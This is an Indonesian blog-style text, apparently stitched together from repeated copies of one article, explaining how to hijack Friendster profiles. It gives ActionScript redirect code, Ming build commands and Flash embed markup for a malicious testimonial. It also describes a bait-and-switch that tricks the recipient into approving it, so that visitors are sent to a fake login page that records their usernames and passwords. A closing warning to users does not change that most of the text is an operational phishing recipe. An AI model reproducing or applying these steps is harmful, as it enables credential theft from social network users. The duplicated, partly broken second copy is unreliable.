hack ini 100% hanya akan berhasil kepada korban yg mempunyai koneksi sendiri (internet dirumah). kenapa? karena setelah korban approve, maka system akan mengingat script tersebut. dan pas ia buka friendster untuk yg kedua kalinya, maka system IE akan menampilkan front page FS dengan nuansa berbeda (yg sebenarnya ini adalah front page untuk merecord username sama passwordnya).
apabila korban tidak curiga, maka ia akan memasukkan username sama passwordnya. apabila korban curiga, maka ia akan menutup IE dan mengulang lagi (setelah ditutup, maka script otomastis akan terhapus). silahkan di testi lagi :D.
frontpage yg palsu sedikit berbeda dari front page yg asli (front page FS).
Hack Friendster
Dalam artikel saya sebelumnya mengenai Friendster palsu, teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah berikut :
apt-get install libming-util
Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :
getURL("http://www.contoh.com");
misalkan seperti berikut :
getURL("http://chaidir.wordpress.com");
Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :
chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as
Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung ‘diarahkan’ menuju http://chaidir.wordpress.com.
Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan testimonial dengan memasukkan file flash ini.
Jangan mengirimkan testimonial ini keteman anda, karena profile teman anda tidak akan bisa diakses!
Caranya masukkan kode berikut :
<object classid=’clsid:D27CDB6E-AE6D-11cf-96B8-444553540000′ codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0′ width=’400′ height=’250′><param name=’movie’ value=’http://numpang.com/out.swf‘ /><param name=’quality’ value=’high’ /><embed src=’http://numpang.com/out.swf‘ quality=’high’ pluginspage=’http://www.macromedia.com/go/getflashplayer’ type=’application/x-shockwave-flash’ width=’400′ height=’250′ allowScriptAccess=”never”></embed></object>
Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.
Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap user memasukkan email dan passwordnya.
‘Fasilitas’ untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk ‘mengelabuhi’ orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.
Pesan buat anak2 ABG pecinta Friendster :
Dan buat anak2 ABG yang sering ke warnet hanya untuk ber-Friendster ria.. apakah tidak ada aktivitas lain di internet selain ber-Friendsteran?! Sangat sayang sekali jika kamu ke warnet cuman liat cowo2 ato cewe2 yang friendsterGenic (keren di friendster doang!) Mendingan belajar cari informasi yang menarik atau belajar apapun dari Internet. Atau lebih baik lagi klo kamu buat buat blog sendiri. Selain belajar nulis, kamu kan juga bisa nambah temen baru. Rugi loh klo bayar 3000 - 4000 perak cuman buat ngeliat Friendster doang, mendingan buat beli bakso!
membobol password friendster
Dalam artikel saya sebelumnya mengenai Friendster palsu, teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah berikut :
apt-get install libming-util
Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :
getURL(”http://www.contoh.com”);
misalkan seperti berikut :
getURL(”http://chaidir.wordpress.com”);
Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :
chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as
Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung ‘diarahkan’ menuju http://chaidir.wordpress.com.
Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan testimonial dengan memasukkan file flash ini.
Jangan mengirimkan testimonial ini keteman anda, karena profile teman anda tidak akan bisa diakses!
Caranya masukkan kode berikut :
<object classid=’clsid:D27CDB6E-AE6D-11cf-96B8-444553540000′ codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.
cab#version=6,0,29,0′ width=’400′ height=’250′>“>
Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.
Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap user memasukkan email dan passwordnya.
‘Fasilitas’ untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk ‘mengelabuhi’ orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.